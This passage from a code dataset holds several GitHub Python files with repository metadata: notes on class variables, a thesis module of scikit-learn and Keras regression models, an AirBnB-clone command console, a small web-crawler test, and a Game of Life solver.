name\r\n#inside the method by using class name\r\n#inside the classmethod by using either class name or cls variable\r\n#inside the static method by using class name.\r\n\r\n\r\n#1.direclty inside the classfrom outside the methods.\r\n\"\"\"\r\nclass Test:\r\n a=\"Himanshu\" #class level variable\r\n def x(self): #instance method\r\n print(\"Hello\",Test.a) #can't access it becAUSE OF DATA ABSTARCTION HERE WE USE CLASS NAME\r\nt=Test() #here it is object referance\r\nprint(t.a)\r\nt.x() \r\n\"\"\"\r\n\r\n#2.inside the constructor by using class name\r\n\"\"\"\r\nclass Test1:\r\n b1=\"my class variable\"\r\n def __init__(self):\r\n self.a=\"instance variable\"\r\n self.b=\"2ns instance variable\"\r\n #here if we create class level variable inside the constructor so we use class name.variablename\r\n Test1.c=\"i'm class level variable\"\r\n def x1(self):\r\n print(\"test1.c====inside the method\",Test1.c)\r\nq=Test1()\r\nprint(q.a)\r\nprint(q.b1)\r\nprint(q.b)\r\nprint(q.c)\r\n\"\"\"\r\n\r\n#3.Inside the method by using class name\r\n\"\"\"\r\nclass Test2:\r\n x=\"my class variable\"\r\n def x1(self):\r\n Test2.new=\"i m class lvl but inside the method\"\r\n print(\"sdfs\",Test2.x)\r\n print(\"svsd\",Test2.new)\r\nd=Test2()\r\nprint(d.x)#object reference\r\nprint(Test2.x) #class name\r\n#Test2.new\r\nd.x1()\r\nTest2.new\r\n\"\"\"\r\n\r\n\r\n#4.inside the class method using cls variable\r\n\r\nclass Test3:\r\n a=\"class lvl var\"\r\n def __init__(self):\r\n self.a1=78\r\n self.b1=98 #these are instance level var\r\n Test3.c1=\"i'm class level but inside the constructor\"\r\n def my(self):\r\n Test3.d1=\"class lvl but inside method\"\r\n Test3.e1=\"instance lvl but inside method\"\r\n print(Test3.d1)\r\n print(self.e1)\r\n print(self.a1)\r\n print(Test3.a)\r\n def my1(a,b):\r\n Test3.f=\"i'm class lvl but in static mehtod\"\r\n @classmethod\r\n def my2(cls): #cls=any variable\r\n cls.g=\"i'm class lvl but inside class method\"\r\n Test3.h=\"also in class method but using classname\"\r\n self.t=5\r\n\r\ny=Test3()\r\n\"\"\"print(y.a)\r\nprint(y.b1)\r\nprint(y.a1)\r\n\r\n#Test3.c1()\r\n#Test3.my()#not psossible\"\"\"\r\ny.my()\r\n\r\ny.my1(5)\r\n\r\n","repo_name":"himanshu98-git/python_notes","sub_path":"stetic vriable.py","file_name":"stetic vriable.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25210494346","text":"import sys, os\nROOT_PATH = os.path.abspath(\".\").split(\"src\")[0]\nif ROOT_PATH not in sys.path:\n sys.path.append(ROOT_PATH)\nmodule_path = os.path.abspath(os.path.join(ROOT_PATH+\"/src/utils/\"))\nif module_path not in sys.path:\n sys.path.append(module_path)\n\nfrom sklearn.linear_model import (ElasticNet, ElasticNetCV, LinearRegression, Lasso, LassoCV, Ridge, RidgeCV)\nfrom sklearn.neural_network import MLPRegressor, BernoulliRBM\nfrom sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor, BaggingRegressor, AdaBoostRegressor\nfrom sklearn.svm import LinearSVR\nfrom sklearn.tree import DecisionTreeRegressor\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.engine.input_layer import Input\nfrom keras.regularizers import l2, l1, l1_l2\nfrom keras.preprocessing.sequence import TimeseriesGenerator\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom keras.callbacks.callbacks import ModelCheckpoint\nfrom keras.layers.recurrent import GRU, LSTM\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom copy import deepcopy\n\nimport pickle\nimport numpy as np\nimport tensorflow as tf\nfrom modelFuncs import getRNNSplit\n\nnp.random.seed(100)\ntf.random.set_seed(100)\n\nCURRENT_MODEL_WEIGHTS_FILEPATH = ROOT_PATH + '/src/ml/trained_models/training_weights/'\n\nclass Args():\n def __init__(self, args):\n self.activation = args['activation']\n self.loss = args['loss']\n self.optimizer = args['optimizer']\n self.metrics = args['metrics']\n self.epochs = args['epochs']\n self.batchSize = args['batchSize']\n self.verbose = args['verbose']\n self.callbacks= args['callbacks']\n self.enrolWindow = args['enrolWindow']\n self.validationSize = args['validationSize']\n self.testSize = args['testSize']\n\nclass EnsembleModel():\n def __init__(self, models, X_train, y_train, modelType=\"Ensemble\", name=None):\n maxEnrol = 0\n for model in models:\n if model.args is not None:\n enrol = model.args.enrolWindow\n if enrol is not None and enrol > maxEnrol:\n maxEnrol = enrol\n\n self.maxEnrol = maxEnrol\n self.models = models\n self.MLmodel = None\n self.X_train = X_train\n self.y_train = y_train\n self.name = name\n self.history = None\n self.modelType = modelType\n\n def train(self):\n preds = []\n for model in self.models:\n model.train()\n prediction = model.predict(model.X_train, model.y_train)\n if model.modelType == \"RNN\":\n preds.append(prediction[self.maxEnrol - model.args.enrolWindow:])\n else:\n preds.append(prediction[self.maxEnrol:])\n\n train = preds[0]\n for pred in preds[1:]:\n train = np.concatenate((train, pred), axis=1)\n self.MLmodel = sklearnLinear(\n params = { \n 'name': 'Linear model of ensemble',\n 'X_train': train,\n 'y_train': self.y_train[self.maxEnrol:],\n },\n )\n self.MLmodel.train()\n\n def trainEnsemble(self):\n preds = []\n for model in self.models:\n prediction = model.predict(model.X_train, model.y_train)\n if model.modelType == \"RNN\":\n preds.append(prediction[self.maxEnrol - model.args.enrolWindow:])\n else:\n preds.append(prediction[self.maxEnrol:])\n\n train = preds[0]\n for pred in preds[1:]:\n train = np.concatenate((train, pred), axis=1)\n self.MLmodel = sklearnLinear(\n params = {\n 'name': 'Linear model of ensemble',\n 'X_train': train,\n 'y_train': self.y_train[self.maxEnrol:],\n },\n )\n self.MLmodel.train()\n\n def predict(self, X, y):\n preds = []\n for model in self.models:\n prediction = model.predict(X, y)\n if model.modelType == \"RNN\":\n preds.append(prediction[self.maxEnrol - model.args.enrolWindow:])\n else:\n preds.append(prediction[self.maxEnrol:])\n\n test = preds[0]\n for pred in preds[1:]:\n test = np.concatenate((test, pred), axis=1)\n return self.MLmodel.predict(test)\n\n def save(self, directory, name):\n for model in self.models:\n if model.args:\n dirr = directory + name + '/'\n if not os.path.exists(dirr):\n os.makedirs(dirr)\n model.save(dirr, \"_\".join(model.name.split(' ')))\n\nclass MachinLearningModel():\n def __init__(self, model, X_train, y_train, args=None, modelType=None, scaler=\"standard\", name=None):\n if scaler == \"standard\":\n inputScaler = StandardScaler()\n outputScaler = StandardScaler()\n else:\n inputScaler = MinMaxScaler()\n outputScaler = MinMaxScaler()\n \n inputScaler.fit(X_train)\n outputScaler.fit(y_train)\n\n self.model = model\n self.X_train = X_train\n self.y_train = y_train\n self.args = args\n self.name = name\n self.history = None\n self.inputScaler = inputScaler\n self.outputScaler = outputScaler\n self.modelType = modelType\n\n def train(self):\n checkpoint_path = CURRENT_MODEL_WEIGHTS_FILEPATH + \"_\".join(self.name.split(\" \"))\n if not os.path.exists(checkpoint_path):\n os.makedirs(checkpoint_path)\n weights_path = checkpoint_path + \"/current_weights.h5\"\n checkpoint = ModelCheckpoint(\n filepath=weights_path,\n monitor='val_loss',\n verbose=1,\n save_weights_only=True,\n save_best_only=True,\n ),\n\n if self.modelType == \"RNN\":\n \"\"\"\n THIS CODE CAN BE USED IF GENERATORS ARE DESIRED\n NB: not suitable for heat exchanger data,\n because the validation data will not have\n the same properties as the training data\n See thesis for details\n\n X_t, X_v, y_t, y_v = train_test_split(self.X_train, self.y_train, test_size=0.2, shuffle=False)\n validation_generator = TimeseriesGenerator(\n self.inputScaler.transform(X_v),\n self.outputScaler.transform(y_v),\n length = self.args.enrolWindow,\n sampling_rate = 1,\n batch_size = self.args.batchSize\n )\n train_generator = TimeseriesGenerator(\n self.inputScaler.transform(X_t),\n self.outputScaler.transform(y_t),\n length = self.args.enrolWindow,\n sampling_rate = 1,\n batch_size = self.args.batchSize\n )\n self.model.compile(\n loss = self.args.loss,\n optimizer = self.args.optimizer,\n metrics = self.args.metrics\n )\n history = self.model.fit_generator(\n train_generator,\n epochs = self.args.epochs,\n verbose = self.args.verbose,\n callbacks = [*self.args.callbacks, *checkpoint],\n validation_data = validation_generator,\n )\n \"\"\"\n # Own implementation of train-val split for RNN data\n X_t, X_v, y_t, y_v = getRNNSplit(\n self.inputScaler.transform(self.X_train),\n self.outputScaler.transform(self.y_train),\n self.args.enrolWindow,\n validation_split=0.2,\n )\n self.model.compile(\n loss = self.args.loss,\n optimizer = self.args.optimizer,\n metrics = self.args.metrics\n )\n history = self.model.fit(\n X_t,\n y_t,\n epochs = self.args.epochs,\n batch_size = self.args.batchSize,\n verbose = self.args.verbose,\n callbacks = [*self.args.callbacks, *checkpoint],\n validation_data = (X_v, y_v),\n )\n self.history = history.history\n self.model.load_weights(weights_path)\n elif self.modelType == \"MLP\":\n self.model.compile(\n loss = self.args.loss,\n optimizer = self.args.optimizer,\n metrics = self.args.metrics\n )\n history = self.model.fit(\n self.inputScaler.transform(self.X_train),\n self.outputScaler.transform(self.y_train),\n epochs = self.args.epochs,\n batch_size = self.args.batchSize,\n verbose = self.args.verbose,\n callbacks = [*self.args.callbacks, *checkpoint],\n validation_split = self.args.validationSize,\n )\n self.history = history.history\n self.model.load_weights(weights_path)\n else:\n history = self.model.fit(\n self.inputScaler.transform(self.X_train),\n self.outputScaler.transform(self.y_train),\n )\n if hasattr(self.model, 'coef_'):\n print(\" Trained weights for \" + self.name + \":\")\n print(str(self.model.coef_))\n self.history = None\n\n def predict(self, X, y=None):\n if self.modelType == \"RNN\":\n test_generator = TimeseriesGenerator(\n self.inputScaler.transform(X),\n self.outputScaler.transform(y),\n length = self.args.enrolWindow,\n sampling_rate = 1,\n batch_size = self.args.batchSize\n )\n return self.outputScaler.inverse_transform(\n self.model.predict(test_generator)\n )\n else:\n return self.outputScaler.inverse_transform(\n self.model.predict(\n self.inputScaler.transform(X)\n )\n )\n\n def predictMultiple(self, X, y, numberOfPredictions=20):\n if self.modelType == \"RNN\":\n predictions = np.zeros((numberOfPredictions, (y.shape[0] - self.args.enrolWindow), y.shape[1]))\n for i in range(numberOfPredictions):\n predictions[i] = self.predict(X, y)\n\n mean = np.array([np.mean(predictions[:,:,i], axis=0) for i in range(y.shape[1])]).T\n standarddev = np.array([np.std(predictions[:,:,i], axis=0) for i in range(y.shape[1])]).T\n \n return [predictions, mean, standarddev]\n else:\n return None\n\n def save(self, directory, name):\n if self.args:\n self.model.save(directory + name + \".h5\")\n with open(directory + name + \".pickle\", 'wb') as file_pi:\n pickle.dump(self.history, file_pi)\n\n\nclass AutoencoderModel():\n def __init__(self, model, X_train, args=None, modelType=\"AUTOENCODER\", scaler=\"standard\", name=None):\n if scaler == \"standard\":\n inputScaler = StandardScaler()\n else:\n inputScaler = MinMaxScaler()\n \n inputScaler.fit(X_train)\n\n self.model = model\n self.X_train = X_train\n self.args = args\n self.name = name\n self.history = None\n self.inputScaler = inputScaler\n self.modelType = modelType\n\n def train(self):\n self.model.compile(\n loss = self.args.loss,\n optimizer = self.args.optimizer,\n metrics = self.args.metrics\n )\n history = self.model.fit(\n self.inputScaler.transform(self.X_train),\n self.inputScaler.transform(self.X_train),\n epochs = self.args.epochs,\n batch_size = self.args.batchSize,\n verbose = self.args.verbose,\n callbacks = self.args.callbacks,\n validation_split = self.args.validationSize,\n )\n self.history = history.history\n\n def predict(self, X, y=None):\n return self.inputScaler.inverse_transform(\n self.model.predict(\n self.inputScaler.transform(X)\n )\n )\n\n def save(self, directory, name):\n if self.args:\n self.model.save(directory + name + \".h5\")\n with open(directory + name + \".pickle\", 'wb') as file_pi:\n pickle.dump(self.history, file_pi)\n\ndef ensembleModel(\n params,\n models,\n ):\n\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n\n return EnsembleModel(\n models,\n X,\n Y,\n name=name,\n )\n\ndef kerasLSTM(\n params,\n layers=[128],\n dropout=0.0,\n recurrentDropout=0.0,\n alpha=None,\n training=False,\n ):\n\n X_train = params['X_train']\n y_train = params['y_train']\n name = params['name']\n args = Args(params['args'])\n input_layer = Input(shape=(None,X_train.shape[-1]))\n\n if len(layers) > 1:\n firstLayerUnits = layers[0]\n layer_1 = LSTM(firstLayerUnits,\n activation = args.activation,\n dropout = dropout,\n recurrent_dropout = recurrentDropout,\n return_sequences = True)(input_layer, training=training)\n if alpha is not None:\n layer_1 = LeakyReLU(alpha=alpha)(layer_1)\n for i, layerUnits in enumerate(layers[1:]):\n layer_1 = LSTM(layerUnits,\n activation = args.activation,\n dropout = dropout,\n recurrent_dropout = recurrentDropout,\n return_sequences = True if (i < len(layers) - 2) else False)(layer_1, training=training)\n if alpha is not None:\n layer_1 = LeakyReLU(alpha=alpha)(layer_1)\n else:\n firstLayerUnits = layers[0]\n layer_1 = LSTM(firstLayerUnits,\n activation = args.activation,\n dropout = dropout,\n return_sequences = False,\n recurrent_dropout = recurrentDropout)(input_layer, training=training)\n if alpha is not None:\n layer_1 = LeakyReLU(alpha=alpha)(layer_1)\n\n output_layer = Dense(\n y_train.shape[-1],\n activation='linear')(layer_1)\n \n model = Model(input_layer, output_layer)\n\n return MachinLearningModel(\n model,\n X_train,\n y_train,\n args=args,\n modelType=\"RNN\",\n name=name,\n )\n\ndef kerasGRU(\n params,\n layers=[128],\n dropout=0.0,\n recurrentDropout=0.0,\n alpha=None,\n training=False,\n ):\n\n X_train = params['X_train']\n y_train = params['y_train']\n name = params['name']\n args = Args(params['args'])\n input_layer = Input(shape=(None,X_train.shape[-1]))\n\n if len(layers) > 1:\n firstLayerUnits = layers[0]\n layer_1 = GRU(\n firstLayerUnits,\n activation = args.activation,\n dropout = dropout,\n recurrent_dropout = recurrentDropout,\n return_sequences = True)(input_layer, training=training)\n if alpha is not None:\n layer_1 = LeakyReLU(alpha=alpha)(layer_1)\n for layerUnits in layers[1:]:\n layer_1 = GRU(\n layerUnits,\n activation = args.activation,\n dropout = dropout,\n recurrent_dropout = recurrentDropout,\n return_sequences = False)(layer_1, training=training)\n if alpha is not None:\n layer_1 = LeakyReLU(alpha=alpha)(layer_1)\n else:\n firstLayerUnits = layers[0]\n layer_1 = GRU(\n firstLayerUnits,\n activation = args.activation,\n dropout = dropout,\n recurrent_dropout = recurrentDropout)(input_layer, training=training)\n if alpha is not None:\n layer_1 = LeakyReLU(alpha=alpha)(layer_1)\n\n output_layer = Dense(\n y_train.shape[-1],\n activation='linear')(layer_1)\n \n model = Model(input_layer, output_layer)\n\n return MachinLearningModel(\n model,\n X_train,\n y_train,\n args=args,\n modelType=\"RNN\",\n name=name,\n )\n\ndef kerasMLP(\n params,\n structure,\n dropout=None,\n l1_rate=0.0,\n l2_rate=0.0,\n ):\n\n X_train = params['X_train']\n y_train = params['y_train']\n name = params['name']\n args = Args(params['args'])\n\n model = Sequential()\n\n firstLayerNeurons, firstLayerActivation = structure[0]\n model.add(\n Dense(\n firstLayerNeurons,\n input_dim=X_train.shape[1],\n activation=firstLayerActivation,\n kernel_regularizer=l1_l2(l1=l1_rate, l2=l2_rate),\n )\n )\n if dropout is not None:\n model.add(Dropout(dropout))\n\n for neurons, activation in structure[1:]:\n model.add(\n Dense(\n neurons,\n activation=activation,\n kernel_regularizer=l1_l2(l1=l1_rate, l2=l2_rate),\n )\n )\n if dropout is not None:\n model.add(Dropout(dropout))\n \n model.add(\n Dense(\n y_train.shape[1],\n activation='linear',\n )\n )\n\n return MachinLearningModel(\n model,\n X_train,\n y_train,\n args=args,\n modelType=\"MLP\",\n name=name,\n )\n\ndef sklearnSVM(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = LinearSVR()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnDecisionTree(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = DecisionTreeRegressor()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnAdaBoost(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = AdaBoostRegressor()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnBagging(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = BaggingRegressor()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnGradientBoosting(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = GradientBoostingRegressor()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnRandomForest(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = RandomForestRegressor()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnMLP(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = MLPRegressor(early_stopping=True)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnLinear(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = LinearRegression()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnLasso(params, alpha=0.1):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = Lasso(alpha=alpha)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnLassoCV(params, alphas=(0.1, 1.0, 10.0), folds=10):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = LassoCV(alphas=alphas, cv=folds)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnRidge(params, alpha=1.0):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = Ridge(alpha=alpha)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnRidgeCV(params, alphas=(0.1, 1.0, 10.0), folds=10):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = RidgeCV(alphas=alphas, cv=folds)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnElasticNet(params, alpha=1.0, l1_ratio=0.5):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = ElasticNet(alpha=alpha, l1_ratio=l1_ratio)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnElasticNetCV(params, alphas=(0.1, 1.0, 10.0), l1_ratio=0.5, folds=10):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = ElasticNetCV(alphas=alphas, l1_ratio=l1_ratio, cv=folds)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef autoencoder_Dropout(params, dropout=0.2, encodingDim=3):\n X = params['X_train']\n name = params['name']\n args = Args(params['args'])\n\n if encodingDim > 3:\n encodingDim = 3\n\n input_d = Input(shape=(X.shape[1],))\n encoded = Dense(6, activation='tanh')(input_d)\n encoded = Dropout(dropout)(encoded)\n encoded = Dense(5, activation='tanh')(encoded)\n encoded = Dropout(dropout)(encoded)\n encoded = Dense(4, activation='tanh')(encoded)\n encoded = Dropout(dropout)(encoded)\n encoded = Dense(encodingDim, activation='tanh')(encoded)\n #encoded = Dropout(dropout)(encoded)\n decoded = Dense(4, activation='tanh')(encoded)\n #decoded = Dropout(dropout)(decoded)\n decoded = Dense(5, activation='tanh')(decoded)\n #decoded = Dropout(dropout)(decoded)\n decoded = Dense(6, activation='tanh')(decoded)\n #decoded = Dropout(dropout)(decoded)\n decoded = Dense(X.shape[1], activation='linear')(decoded)\n model = Model(input_d, decoded)\n return AutoencoderModel(model, X, args, modelType=\"AUTOENCODER\", name=name)\n\ndef autoencoder_Regularized(params, l1_rate=10e-4, encodingDim=3):\n X = params['X_train']\n name = params['name']\n args = Args(params['args'])\n\n if encodingDim > 3:\n encodingDim = 3\n\n model = Sequential()\n model.add(Dense(X.shape[1]))\n model.add(Dense(6, activation='tanh', activity_regularizer=l1(l1_rate)))\n model.add(Dense(5, activation='tanh', activity_regularizer=l1(l1_rate)))\n model.add(Dense(4, activation='tanh', activity_regularizer=l1(l1_rate)))\n model.add(Dense(encodingDim, activation='tanh', activity_regularizer=l1(l1_rate)))\n model.add(Dense(4, activation='tanh'))\n model.add(Dense(5, activation='tanh'))\n model.add(Dense(6, activation='tanh'))\n model.add(Dense(X.shape[1], activation='linear'))\n return AutoencoderModel(model, X, args, modelType=\"AUTOENCODER\", name=name)","repo_name":"hermanwh/master-thesis","sub_path":"src/utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":22774,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"96"} +{"seq_id":"23551019892","text":"#adding items into shopping cart\n\nprint(\"shopping cart\")\nitem_list=[]\nwhile(True):\n item=input(\"enter the item name:\")\n qty=int(input(\"enter quantity:\"))\n each_item=[]\n each_item.append(item)\n each_item.append(qty)\n item_list.append(each_item)\n more=input(\"do you want to continue(yes/no):\")\n if(more==\"no\"):\n break\nprint(\"you have purchased:\",item_list)\n","repo_name":"1madhura/python","sub_path":"shoppingcart.py","file_name":"shoppingcart.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"30208858666","text":"#!/usr/bin/python3\n\"\"\" contains the entry point of the command interpreter \"\"\"\n\nimport cmd\nimport re\nfrom shlex import split\nfrom models.base_model import BaseModel\nfrom models.engine.file_storage import FileStorage\nfrom models.user import User\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.review import Review\nimport models\n\n\ndef parse(arg):\n curly_braces = re.search(r\"\\{(.*?)\\}\", arg)\n brackets = re.search(r\"\\[(.*?)\\]\", arg)\n if curly_braces is None:\n if brackets is None:\n return [i.strip(\",\") for i in split(arg)]\n else:\n lexer = split(arg[:brackets.span()[0]])\n retl = [i.strip(\",\") for i in lexer]\n retl.append(brackets.group())\n return retl\n else:\n lexer = split(arg[:curly_braces.span()[0]])\n retl = [i.strip(\",\") for i in lexer]\n retl.append(curly_braces.group())\n return retl\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\"command interpreter for HBNB\"\"\"\n __classList = {\n \"BaseModel\",\n \"User\",\n \"Place\",\n \"State\",\n \"City\",\n \"Amenity\",\n \"Review\"\n }\n\n prompt = \"(hbnb) \"\n\n def default(self, arg):\n \"\"\"Default behavior for cmd module when input is invalid\"\"\"\n argdict = {\n \"all\": self.do_all,\n \"show\": self.do_show,\n \"destroy\": self.do_destroy,\n \"count\": self.do_count,\n \"update\": self.do_update\n }\n match = re.search(r\"\\.\", arg)\n if match is not None:\n argl = [arg[:match.span()[0]], arg[match.span()[1]:]]\n match = re.search(r\"\\((.*?)\\)\", argl[1])\n if match is not None:\n command = [argl[1][:match.span()[0]], match.group()[1:-1]]\n if command[0] in argdict.keys():\n call = \"{} {}\".format(argl[0], command[1])\n return argdict[command[0]](call)\n print(\"*** Unknown syntax: {}\".format(arg))\n return False\n\n def do_quit(self, arg):\n \"\"\"quit command exits the program\"\"\"\n return True\n\n def do_EOF(self, arg):\n \"\"\"EOF command exits the program\"\"\"\n print()\n return True\n\n def emptyline(self):\n \"\"\"Does notting when empty line is received\"\"\"\n pass\n\n def do_create(self, cls):\n \"\"\"Usage: create <class>\n creates a new instance and prints its id\"\"\"\n if len(cls) == 0:\n print(\"** class name missing **\")\n elif cls not in HBNBCommand.__classList:\n print(\"** class doesn't exist **\")\n else:\n new = eval(cls)()\n models.storage.save()\n print(new.id)\n\n def do_show(self, args):\n \"\"\"Usage: show <class> <id> or <class>.show(<id>)\n prints the string representation of an instance based\n on the class name and id\"\"\"\n objD = models.storage.all()\n argList = parse(args)\n if len(argList) == 0:\n print(\"** class name missing **\")\n elif argList[0] not in HBNBCommand.__classList:\n print(\"** class doesn't exist **\")\n elif len(argList) < 2:\n print(\"** instance id missing **\")\n elif argList[0] + \".\" + argList[1] not in objD:\n print(\"** no instance found **\")\n else:\n key = argList[0] + \".\" + argList[1]\n obj = objD[key]\n print(obj)\n\n def do_destroy(self, args):\n \"\"\"Usage: destroy <class> <id> or <class>.destroy(<id>)\n deletes an instance based on the class name and id\"\"\"\n objD = models.storage.all()\n argList = parse(args)\n if len(argList) == 0:\n print(\"** class name missing **\")\n elif argList[0] not in HBNBCommand.__classList:\n print(\"** class doesn't exist **\")\n elif len(argList) < 2:\n print(\"** instance id missing **\")\n elif argList[0] + \".\" + argList[1] not in objD:\n print(\"** no instance found **\")\n else:\n key = argList[0] + \".\" + argList[1]\n obj = objD[key]\n del objD[key]\n models.storage.save()\n\n def do_all(self, arg):\n \"\"\"Usage: all or all <class> or <class>.all()\n prints all string representation of all instances based or not\n on the class name\"\"\"\n objD = models.storage.all()\n argList = parse(arg)\n objList = []\n if len(argList) > 0 and argList[0] not in HBNBCommand.__classList:\n print(\"** class doesn't exist **\")\n else:\n objList = []\n if len(argList) == 0:\n for obj in objD.values():\n objList.append(obj.__str__())\n else:\n for obj in objD.values():\n if argList[0] == (obj.to_dict())[\"__class__\"]:\n objList.append(obj.__str__())\n print(objList)\n\n def do_update(self, arg):\n \"\"\"Usage: update <class> <id> <attribute_name> <attribute_value>\n or <class>.update(<id>, <attribute_name>, <attribute_value>) or\n <class>.update(<id>, <dictionary>)\n updates an instance based on the class name and id by adding or\n updating attribute (save the change to the JSON file)\n \"\"\"\n objD = models.storage.all()\n argL = parse(arg)\n\n if len(argL) == 0:\n print(\"** class name missing **\")\n return False\n elif argL[0] not in HBNBCommand.__classList:\n print(\"** class doesn't exist **\")\n return False\n elif len(argL) < 2:\n print(\"** instance id missing **\")\n return False\n elif argL[0] + \".\" + argL[1] not in objD:\n print(\"** no instance found **\")\n return False\n elif len(argL) < 3:\n print(\"** attribute name missing **\")\n return False\n elif len(argL) < 4:\n try:\n type(eval(argL[2])) != dict\n except NameError:\n print(\"** value missing **\")\n return False\n\n if len(argL) == 4:\n obj = objD[\"{}.{}\".format(argL[0], argL[1])]\n if argL[2] in obj.__class__.__dict__.keys():\n valtype = type(obj.__class__.__dict__[argL[2]])\n obj.__dict__[argL[2]] = valtype(argL[3])\n else:\n obj.__dict__[argL[2]] = argL[3]\n elif type(eval(argL[2])) == dict:\n obj = objD[\"{}.{}\".format(argL[0], argL[1])]\n for k, v in eval(argL[2]).items():\n if (k in obj.__class__.__dict__.keys() and\n type(obj.__class__.__dict__[k]) in {str, int, float}):\n valtype = type(obj.__class__.__dict__[k])\n obj.__dict__[k] = valtype(v)\n else:\n obj.__dict__[k] = v\n models.storage.save()\n\n def do_count(self, arg):\n \"\"\"Usage: count <class> or <class>.count()\n Retrieve the number of instances of a given class.\"\"\"\n argl = parse(arg)\n count = 0\n for obj in models.storage.all().values():\n if argl[0] == obj.__class__.__name__:\n count += 1\n print(count)\n\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n","repo_name":"Dcode3244/AirBnB_clone","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":7378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"29217348824","text":"__author__ = 'zhangxa'\n\nfrom curl import Curl\nimport pycurl\n\nfrom html.parser import HTMLParser\nfrom htmlParser.htmlParser import UrlHtmlParser\nfrom download.downFile import DownFile\nfrom urlHandler.urlHandler import UrlBaseHandler\nfrom urlQueue.urlQueue import UrlQueue\n\nstart_url = \"http://www.pcgames.com.cn/\"\nc = Curl()\nc.set_url(start_url)\ndata = c.get()\ninfo = c.info()\n#print(info)\n\ndef get_charset(c_type):\n charset=None\n try:\n if c_type and 'charset' in c_type:\n start = c_type.find('charset=')\n charset_str = c_type[start:]\n end = charset_str.find(' ')\n if end > -1:\n charset = charset_str[len('charset='):end]\n else:\n charset = charset_str[len('charset='):]\n except:\n return 'UTF-8'\n if charset == None:\n return 'UTF-8'\n\n#print(get_charset('text/html charset=gb2312 UTF-9'))\nprint(get_charset(info['content-type']))\nparser = HTMLParser()\nparser.feed(data.decode(\"GBK\"))\nc.close()","repo_name":"happyAnger6/anger6Spider","sub_path":"test/test_one_url.py","file_name":"test_one_url.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"96"} +{"seq_id":"33148487900","text":"def game_of_life(tests):\n for _ in range(tests):\n board = read_board()\n for _ in range(100):\n next_board = copy_board(board)\n for i in range(5):\n for j in range(5):\n check_cell(board, next_board, i, j)\n board = next_board\n if is_alive(board):\n print(\"yes\")\n else:\n print(\"no\")\n\ndef check_cell(board, next_board, i, j):\n count = count_neighbours(board, i, j)\n if board[i][j] == 1:\n if count < 2 or count > 3:\n next_board[i][j] = 0\n else:\n if count == 3:\n next_board[i][j] = 1\n\ndef count_neighbours(board, i, j):\n count = 0\n for x in range(i-1, i+2):\n for y in range(j-1, j+2):\n if x == i and y == j:\n continue\n x = x % 5\n y = y % 5\n if board[x][y] == 1:\n count += 1\n return count\n\ndef is_alive(board):\n for i in range(5):\n for j in range(5):\n if board[i][j] == 1:\n return True\n return False\n\ndef read_board():\n board = []\n for _ in range(5):\n board.append([int(c) for c in input()])\n return board\n\ndef copy_board(board):\n return [row[:] for row in board]\n\ntests = int(input())\ngame_of_life(tests)","repo_name":"Olszewski-Jakub/Matury","sub_path":"SPOJ/Level 4/JZYCIE - Gra w życie.py","file_name":"JZYCIE - Gra w życie.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25722070321","text":"from ..Types.Exceptions import *\n\nclass Skip:\n \"\"\"\n skip: Bypasses a specified number of elements in a sequence and then returns the remaining elements\n\n >>> Enumerable<T> 